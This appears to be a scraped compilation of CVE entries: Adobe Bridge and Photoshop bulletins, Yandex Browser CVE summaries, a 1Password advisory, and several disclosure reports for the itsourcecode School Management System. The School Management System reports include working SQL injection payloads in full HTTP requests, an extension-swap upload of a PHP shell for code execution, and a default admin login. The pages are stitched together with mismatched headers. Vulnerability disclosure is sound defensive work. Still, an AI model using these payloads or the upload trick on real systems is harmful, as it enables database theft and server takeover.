Adobe Bridge version 12.0.1 (and earlier versions) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Bridge | APSB22-25

Bulletin ID

Date Published

Priority

APSB22-25

June 14, 2022  

3

**Summary**

Adobe has released a security update for Adobe Bridge. This update addresses critical and important vulnerabilities that could lead to arbitrary code execution, arbitrary file system write and memory leak.

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Bridge    

12.0.1 and earlier versions   

Windows  and macOS

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.   

Product

Version

Platform

Priority     

Availability      

Adobe Bridge    

12.0.2  

Windows and macOS    

3

Download Page    

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**  

**CVSS vector**

CVE Numbers

Out-of-bounds Write (CWE-787)  

Arbitrary code execution

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-28839

Out-of-bounds Write (CWE-787)  

Arbitrary file system write  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-28840

Improper Input Validation (CWE-20)

Arbitrary code execution

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28841  

Use After Free (CWE-416)

Arbitrary code execution  

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28842  

Improper Input Validation (CWE-20)

Arbitrary code execution  

Critical    

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28843  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical    

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28844  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28845  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28846  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28847  

Improper Input Validation (CWE-20)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28848  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28849  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28850  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:    

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-28839, CVE-2022-28840, CVE-2022-28841, CVE-2022-28842, CVE-2022-28843, CVE-2022-28844, CVE-2022-28845, CVE-2022-28846, CVE-2022-28847, CVE-2022-28848, CVE-2022-28849, CVE-2022-28850)
    

**Revisions**

December 6th, 2021: Added CVE details for CVE-2021-44185, CVE-2021-44186, CVE-2021-44187   

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2022-28850: Adobe Security Bulletin

Adobe Photoshop version 22.5.1 (and earlier versions ) is affected by an Access of Memory Location After End of Buffer vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.

Security updates available for Adobe Photoshop | APSB21-109

**Bulletin ID**

**Date Published**

**Priority**

APSB21-109

October 26, 2021        

3

**Summary**

Adobe has released updates for Photoshop for Windows and macOS. These updates resolve a critical and moderate vulnerabilities.  Successful exploitation could lead in arbitrary code execution and privilege escalation in the context of the current user.     
                   

**Affected Versions**

22.5.1  and earlier versions       

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.    

**Product**

**Updated versions**

**Platform**

**Priority**

Photoshop 2021  

22.5.2  

Windows and macOS  

3  

Photoshop 2022

23.0  

Windows and macOS

3

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**   

**CVSS vector**  

**CVE Number**

Out-of-bounds Read (CWE-125)   

Privilege escalation   

Moderate

3.3

  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N   

CVE-2021-42734  

Access of Memory Location After End of Buffer (CWE-788)   

Arbitrary code execution   

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H   

CVE-2021-42735  

Buffer Overflow (CWE-120)   

Arbitrary code execution   

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H   

CVE-2021-42736     

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:    

*   (yjdfy) CQY of Topsec Alpha Team CVE-2021-42735
    
*   (cff\_123) CFF of Topsec Alpha Team- CVE-2021-42736
    
*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2021-42734)  
    

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-42735: Adobe Security Bulletin

Local privilege vulnerability in Yandex Browser for Windows prior to 22.3.3.801 allows a local, low privileged, attacker to execute arbitary code with the SYSTEM privileges through manipulating temporary files in directory with insecure permissions during Yandex Browser update process.

Security WiFi bypass in Yandex Browser from version 15.10 to 15.12 allows remote attacker to sniff traffic in open or WEP-protected wi-fi networks despite of special security mechanism is enabled.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 15.12.0 to 16.2 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 16.7 to 16.9 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

CSRF of synchronization form in Yandex Browser for desktop before version 16.6 could be used by remote attacker to steal saved data in browser profile.

XSS in Yandex Browser BookReader in Yandex browser for desktop for versions before 16.6. could be used by remote attacker for evaluation arbitrary javascript code.

XSS in Yandex Browser Translator in Yandex browser for desktop for versions from 15.12 to 16.2 could be used by remote attacker for evaluation arbitrary javascript code.

Yandex Browser for iOS before 16.10.0.2357 does not properly restrict processing of facetime:// URLs, which allows remote attackers to initiate facetime-call without user's approval and obtain video and audio data from a device via a crafted web site.

Yandex Browser for desktop before 17.1.1.227 does not show Protect (similar to Safebrowsing in Chromium) warnings in web-sites with special content-type, which could be used by remote attacker for prevention Protect warning on own malicious web-site.

Yandex Browser before 16.9.0 allows remote attackers to spoof the address bar via window.open.

Race condition issue in Yandex Browser for Android before 17.4.0.16 allowed a remote attacker to potentially exploit memory corruption via a crafted HTML page.

Yandex Browser installer for Desktop before 17.4.1 has a DLL Hijacking Vulnerability because an untrusted search path is used for dnsapi.dll, winmm.dll, ntmarta.dll, cryptbase.dll or profapi.dll.

Yandex Browser before 20.8.4 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite before 20.10.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android before 21.1.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android prior to version 21.1.0 allows remote attackers to cause a denial of service.

Kirtikumar Anandrao Ramchandani

Yandex Browser for Android prior to version 21.3.0 allows remote attackers to perform IDN homograph attack.

Kirtikumar Anandrao Ramchandani

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.5.0.826.

An elevation of privilege vulnerability exists in Yandex Browser prior to 21.9.0.390.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.801.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.684.

CVE-2022-28226: Яндекс Охота в Браузере

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject_routing.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject\_routing.php?id=

Vulnerability location: /school/model/get\_subject\_routing.php?id=,id

\[+\] Payload: /school/model/get\_subject\_routing.php?id=-23%20union%20select%201,2,database(),4,5--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject\_routing.php?id\=\-23%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32374: bug_report/SQLi-5.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_grade.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_grade.php?id=

Vulnerability location: /school/model/get\_grade.php?id=,id

\[+\] Payload: /school/model/get\_grade.php?id=-13%20union%20select%201,database(),3,4--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_grade.php?id\=\-13%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32368: bug_report/SQLi-3.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_exam.php?id=.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_exam.php?id=

Vulnerability location: /school/model/get\_exam.php?id=,id

\[+\] Payload: /school/model/get\_exam.php?id=-1%20union%20select%201,database()--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_exam.php?id\=\-1%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32373: bug_report/SQLi-7.md at main · k0xx11/bug_report

An issue was discovered in AgileBits 1Password, involving the method various 1Password apps and integrations used to create connections to the 1Password service. In specific circumstances, this issue allowed a malicious server to convince a 1Password app or integration it is communicating with the 1Password service.

**About the issue**

There was an issue with the method various 1Password apps and integrations used to create connections to the 1Password service. In specific circumstances, this issue allowed a malicious server to convince a 1Password app or integration it is communicating with the 1Password service.

This issue was discovered by Cure53, a penetration testing company that is regularly contracted by 1Password to perform security assessments on 1Password products. **1Password has no reason to believe that this issue was discovered or exploited by anyone else.**

**Who is affected**

The following 1Password apps are affected:

*   1Password for Mac 7 (prior to 7.9.5)
*   1Password for Mac 8 (prior to 8.7.1)
*   1Password for Windows 7 (prior to 7.9.829)
*   1Password for Windows 8 (prior to 8.7.1)
*   1Password for Linux (prior to 8.7.1)
*   1Password for Android 7 (prior to 7.9.3)
*   1Password for Android 8 (prior to 8.8.0-104)
*   1Password for iOS 7 (prior to 7.9.6)
*   1Password for iOS 8 (prior to 8.8.0-94)
*   1Password in the browser (prior to 2.3.4)

The following 1Password integrations are affected:

*   1Password CLI 1 (prior to 1.12.5)
*   1Password CLI 2 (prior to 2.3.0)
*   1Password SCIM Bridge (prior to 2.3.2)
*   1Password Connect Server (prior to 1.5.3)

**Recommended action**

Update 1Password to a version that is newer than the ones listed above.

*   How to keep 1Password up to date
*   How to keep 1Password up to date in your browser
*   Update to the latest version of 1Password CLI
*   Update 1Password SCIM bridge

To upgrade 1Password Connect Server, configure Docker or Kubernetes to use version 1.5.3 or latest, then restart your container or pod according to your standard upgrade procedures.

**Impact and exploitability**

If you use a 1Password app or integration in an environment with a compromised network connection, a person-in-the-middle attacker can manipulate your 1Password app or integration into connecting to their server instead of the 1Password service.

This issue could impact you when all the following are true when you use your 1Password app or integration:

*   You are using a compromised network connection, where an attacker can read and manipulate network requests
*   The Transport Layer Security (TLS) connection between the app or integration and 1Password.com is no longer secure, for example, an attacker is using a certificate trusted by your device to authenticate 1Password.com
*   An attacker is specifically targeting your 1Password app or integration that’s affected by the issue described in this article and they create a malicious server application that behaves identically to a 1Password server

An attacker in this scenario can get additional information about the activities you perform in your 1Password account. At a technical level, the attacker is able to inspect the contents of encrypted requests your 1Password app or integration sends to the server. Encrypted request contents can include email addresses of family or team members if you share vaults with them, billing information or security settings, and various other information in your 1Password account.

The attacker **cannot** see secrets saved in 1Password, or attributes (such as the vault name) you view or edit, because they’re encrypted with another mechanism that only allows you to read them. Furthermore, the attacker in this scenario is not able to _manipulate_ encrypted request contents, only observe them. This is because in the described scenario, the attacker is unable to authenticate with 1Password.com on your behalf.

Learn how 1Password encrypts your data, protects your privacy, and safeguards your information in the 1Password Security Design White Paper.

We designed 1Password to protect you even if you can’t trust your network. While this issue only applies to very specific circumstances, we have failed to meet our goal of keeping your data safe. For that, we apologize.

Due to an implementation choice in our version of Secure Remote Password (SRP), we weakened an important layer of security in the way we set up network connections. That’s due to a historical deviation from standard SRP we’ve made in all our apps and integrations. As a result, the vulnerability is unique to 1Password’s way of using SRP. We are quite disappointed that this deviation from standard SRP turns out to be a weakness. Because our business is password management, we pride ourselves in being correct and rigorous in our cryptography protocols. In this case, we haven’t been.

Although we’re disappointed, we’re very happy that Cure53 informed us about the issue. We’ve been working with Cure53 for years, and their feedback has always been tremendously valuable to us and has made our products better and more secure. We’ve mitigated the identified issue to protect the 1Password apps and integrations from this vulnerability, and you can update to a newer version of 1Password to fix the issue on your devices. Moreover, we intend to remove our historical quirk completely, and in the future move to a different password-based authenticated key exchange (PAKE) mechanism altogether.

CVE-2022-32550: Security advisory for 1Password apps and integrations

itsourcecode Advanced School Management System v1.0 is vulnerable to Arbitrary code execution via ip/school/view/all_teacher.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

**Vul\_Author**: **Zhijie Tan**

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/all\_teacher.php(RCE vulnerability exists in "edit" function of Ip/School/view/all\_teacher.php)

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the "edit" function file picture upload point of the TEACHER module in the background management system. You can change the "php" suffix of "shell.php" to "png" to bypass the front-end detection, and then modify the "png" back to the original "php" by grabbing the Burp package. The "shell.php" file can be uploaded successfully after putting back the request packet.

Super Admin account password: suarez081119@gmail.com/12345

Request package for file upload：

POST /school/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/school/view/all\_teacher.php
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12765172874523
Content-Length: 1148
\-----------------------------12765172874523
Content-Disposition: form-data; name="full\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="i\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="address"
School
\-----------------------------12765172874523
Content-Disposition: form-data; name="gender"
Male
\-----------------------------12765172874523
Content-Disposition: form-data; name="phone"
666-666-6666
\-----------------------------12765172874523
Content-Disposition: form-data; name="email"
t6@gmail.com
\-----------------------------12765172874523
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/jpeg
JFJF
<?php phpinfo();?>
\-----------------------------12765172874523
Content-Disposition: form-data; name="c\_page"
1
\-----------------------------12765172874523
Content-Disposition: form-data; name="id"
15
\-----------------------------12765172874523
Content-Disposition: form-data; name="do"
update\_teacher
\-----------------------------12765172874523--

The files will be uploaded to this directory \\school\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32433: bug_report/RCE-1.md at main · tamchikit/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_admin_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_admin\_profile.php?my\_index=

Vulnerability location: /school/model/get\_admin\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_admin\_profile.php?my\_index=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_admin\_profile.php?my\_index\=\-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32381: bug_report/SQLi-11.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_teacher_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_teacher\_profile.php?my\_index=

Vulnerability location: /school/model/get\_teacher\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_teacher\_profile.php?my\_index=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_teacher\_profile.php?my\_index\=\-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

Tag

#windows